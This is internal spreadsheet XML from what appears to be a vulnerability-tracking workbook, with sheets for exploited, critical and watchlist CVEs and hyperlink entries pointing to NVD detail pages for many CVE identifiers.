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KEV - Exploited" sheetId="3" state="visible" r:id="rId3"/>
    <sheet name="Critical &amp; High" sheetId="4" state="visible" r:id="rId4"/>
    <sheet name="Watchlist" sheetId="5" state="visible" r:id="rId5"/>
  </sheets>
  <definedNames>
    <definedName name="_xlnm._FilterDatabase" localSheetId="1" hidden="1">'All CVEs'!$A$1:$M$6126</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="2" hidden="1">'KEV - Exploited'!$A$1:$M$20</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="3" hidden="1">'Critical &amp; High'!$A$1:$M$3528</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="4" hidden="1">'Watchlist'!$A$1:$M$2301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20079" TargetMode="External" Id="rId1" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75650" TargetMode="External" Id="rId2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86218" TargetMode="External" Id="rId3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2016-4117" TargetMode="External" Id="rId4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2022-41352" TargetMode="External" Id="rId5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-25249" TargetMode="External" Id="rId6" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-14733" TargetMode="External" Id="rId7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-67038" TargetMode="External" Id="rId8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19490" TargetMode="External" Id="rId9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86060" TargetMode="External" Id="rId10" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67277" TargetMode="External" Id="rId11" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85046" TargetMode="External" Id="rId12" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87491" TargetMode="External" Id="rId13" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2016-7255" TargetMode="External" Id="rId14" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2022-37969" TargetMode="External" Id="rId15" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-38352" TargetMode="External" Id="rId16" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-31431" TargetMode="External" Id="rId17" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81963" TargetMode="External" Id="rId18" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85880" TargetMode="External" Id="rId19" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2020-14498" TargetMode="External" Id="rId20" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-14560" TargetMode="External" Id="rId21" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19188" TargetMode="External" Id="rId22" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28659" TargetMode="External" Id="rId23" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42043" TargetMode="External" Id="rId24" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44756" TargetMode="External" Id="rId25" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45674" TargetMode="External" Id="rId26" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47691" TargetMode="External" Id="rId27" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48056" TargetMode="External" Id="rId28" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48168" TargetMode="External" Id="rId29" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49883" TargetMode="External" Id="rId30" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54745" TargetMode="External" Id="rId31" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65956" TargetMode="External" Id="rId32" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70352" TargetMode="External" Id="rId33" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73299" TargetMode="External" Id="rId34" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75754" TargetMode="External" Id="rId35" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77770" TargetMode="External" Id="rId36" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79696" TargetMode="External" Id="rId37" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80098" TargetMode="External" Id="rId38" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82004" TargetMode="External" Id="rId39" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83711" TargetMode="External" Id="rId40" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85061" TargetMode="External" Id="rId41" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85978" TargetMode="External" Id="rId42" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86152" TargetMode="External" Id="rId43" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87827" TargetMode="External" Id="rId44" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12645" TargetMode="External" Id="rId45" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12646" TargetMode="External" Id="rId46" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12647" TargetMode="External" Id="rId47" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12650" TargetMode="External" Id="rId48" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19232" TargetMode="External" Id="rId49" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19583" TargetMode="External" Id="rId50" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-22797" TargetMode="External" Id="rId51" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-26084" TargetMode="External" Id="rId52" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47686" TargetMode="External" Id="rId53" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48086" TargetMode="External" Id="rId54" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48273" TargetMode="External" Id="rId55" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48765" TargetMode="External" Id="rId56" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-51366" TargetMode="External" Id="rId57" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52855" TargetMode="External" Id="rId58" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54680" TargetMode="External" Id="rId59" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55089" TargetMode="External" Id="rId60" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55166" TargetMode="External" Id="rId61" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55565" TargetMode="External" Id="rId62" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55634" TargetMode="External" Id="rId63" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62283" TargetMode="External" Id="rId64" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65818" TargetMode="External" Id="rId65" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65974" TargetMode="External" Id="rId66" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66795" TargetMode="External" Id="rId67" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67401" TargetMode="External" Id="rId68" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68487" TargetMode="External" Id="rId69" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68488" TargetMode="External" Id="rId70" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72733" TargetMode="External" Id="rId71" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72735" TargetMode="External" Id="rId72" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72736" TargetMode="External" Id="rId73" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72738" TargetMode="External" Id="rId74" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72740" TargetMode="External" Id="rId75" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72862" TargetMode="External" Id="rId76" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72863" TargetMode="External" Id="rId77" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72864" TargetMode="External" Id="rId78" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72865" TargetMode="External" Id="rId79" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72867" TargetMode="External" Id="rId80" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72868" TargetMode="External" Id="rId81" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72869" TargetMode="External" Id="rId82" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72872" TargetMode="External" Id="rId83" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72876" TargetMode="External" Id="rId84" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72880" TargetMode="External" Id="rId85" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72882" TargetMode="External" Id="rId86" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72886" TargetMode="External" Id="rId87" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72901" TargetMode="External" Id="rId88" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72902" TargetMode="External" Id="rId89" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72911" TargetMode="External" Id="rId90" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73263" TargetMode="External" Id="rId91" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73268" TargetMode="External" Id="rId92" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73269" TargetMode="External" Id="rId93" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73294" TargetMode="External" Id="rId94" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-7374" TargetMode="External" Id="rId95" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78234" TargetMode="External" Id="rId96" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79748" TargetMode="External" Id="rId97" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83941" TargetMode="External" Id="rId98" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84869" TargetMode="External" Id="rId99" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86464" TargetMode="External" Id="rId100" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89094" TargetMode="External" Id="rId101" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2021-43716" TargetMode="External" Id="rId102" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2021-43717" TargetMode="External" Id="rId103" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2023-42179" TargetMode="External" Id="rId104" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2024-11080" TargetMode="External" Id="rId105" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2024-22373" TargetMode="External" Id="rId106" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-29296" TargetMode="External" Id="rId107" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-63823" TargetMode="External" Id="rId108" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-67066" TargetMode="External" Id="rId109" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-70149" TargetMode="External" Id="rId110" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-70150" TargetMode="External" Id="rId111" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-70152" TargetMode="External" Id="rId112" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-70290" TargetMode="External" Id="rId113" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-70293" TargetMode="External" Id="rId114" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-10196" TargetMode="External" Id="rId115" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12744" TargetMode="External" Id="rId116" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12745" TargetMode="External" Id="rId117" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-13447" TargetMode="External" Id="rId118" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-14559" TargetMode="External" Id="rId119" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-14563" TargetMode="External" Id="rId120" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16310" TargetMode="External" Id="rId121" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16504" TargetMode="External" Id="rId122" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18221" TargetMode="External" Id="rId123" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18351" TargetMode="External" Id="rId124" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18658" TargetMode="External" Id="rId125" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18749" TargetMode="External" Id="rId126" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18922" TargetMode="External" Id="rId127" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19931" TargetMode="External" Id="rId128" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-26035" TargetMode="External" Id="rId129" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28606" TargetMode="External" Id="rId130" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28780" TargetMode="External" Id="rId131" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-31020" TargetMode="External" Id="rId132" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-33815" TargetMode="External" Id="rId133" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-33816" TargetMode="External" Id="rId134" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-35868" TargetMode="External" Id="rId135" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-35869" TargetMode="External" Id="rId136" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-36433" TargetMode="External" Id="rId137" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-37003" TargetMode="External" Id="rId138" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-37006" TargetMode="External" Id="rId139" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-37236" TargetMode="External" Id="rId140" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-37751" TargetMode="External" Id="rId141" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-38165" TargetMode="External" Id="rId142" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-39254" TargetMode="External" Id="rId143" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-39255" TargetMode="External" Id="rId144" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-40860" TargetMode="External" Id="rId145" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-41871" TargetMode="External" Id="rId146" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42027" TargetMode="External" Id="rId147" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42581" TargetMode="External" Id="rId148" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45018" TargetMode="External" Id="rId149" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45117" TargetMode="External" Id="rId150" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45538" TargetMode="External" Id="rId151" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-46670" TargetMode="External" Id="rId152" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47698" TargetMode="External" Id="rId153" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47884" TargetMode="External" Id="rId154" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-4800" TargetMode="External" Id="rId155" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48085" TargetMode="External" Id="rId156" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48087" TargetMode="External" Id="rId157" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49819" TargetMode="External" Id="rId158" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49921" TargetMode="External" Id="rId159" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50769" TargetMode="External" Id="rId160" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50774" TargetMode="External" Id="rId161" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50775" TargetMode="External" Id="rId162" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50894" TargetMode="External" Id="rId163" /><Relationship 